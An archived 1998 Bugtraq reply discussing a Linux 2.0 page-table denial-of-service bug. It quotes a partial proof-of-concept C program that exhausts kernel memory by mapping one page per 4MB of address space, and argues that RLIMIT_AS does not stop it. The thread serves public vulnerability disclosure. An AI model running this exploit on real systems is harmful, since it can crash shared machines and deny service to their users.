Bugtraq mailing list archives
Re: linux 2.0 PTE bug
From: peak () kerberos troja mff cuni cz (Pavel Kankovsky)
Date: Thu, 28 May 1998 21:23:34 +0200
On Tue, 26 May 1998 pedward () WEBCOM COM wrote:
(it really has nothing to do with resources). The main factor is RLIMIT_AS, defined in /usr/src/linux/include/asm/resource.h. It controls how much virtual memory a process can map; mmap utilizes virtual memory. You can safely throttle people by running a program which calls setrlimit(2) with RLIMIT_AS as the resource. By far, 3GB is too much. This is only a DoS if you LET it be a DoS.
No. Re-read the program carefully:

<quote author="p6mip300 () INFOP6 CICRP JUSSIEU FR">
void the_handler(int x)
{
    signal(SIGSEGV, the_handler);
    touch_me++;
    if(mmap((void *)address, 4, PROT_READ, MAP_FIXED|MAP_PRIVATE, fd, 0)==(void *)-1) {
        perror("mmap");
        exit(1);
    }
}

void main(void)
{
    [...]
    signal(SIGSEGV, the_handler);
    /* 3*1024*1024*1024 = TASK_SIZE,
     * 1024*4096 = number of bytes one pte can map */
    for (address=0; address<3*1024*1024*1024; address+=1024*4096) {
        i=*(unsigned long *)address;
        if (touch_me) {
            touch_me=0;
            munmap((void *)address, 4);
        }
    }
    [...]
}
</quote>

The program allocates ONE page for each 4MB block of address space. This makes 768 pages (3MB). It would hardly hit a (reasonable) AS limit even if it did not disallocate the page having touched it.

It can run with RLIMIT_AS set to 1MB. At least on my system--I have tried it (according to /proc/*/status, VmSize was 904 kB).

--Pavel Kankovsky aka Peak [ Boycott Microsoft--http://www.vcnet.com/bms ]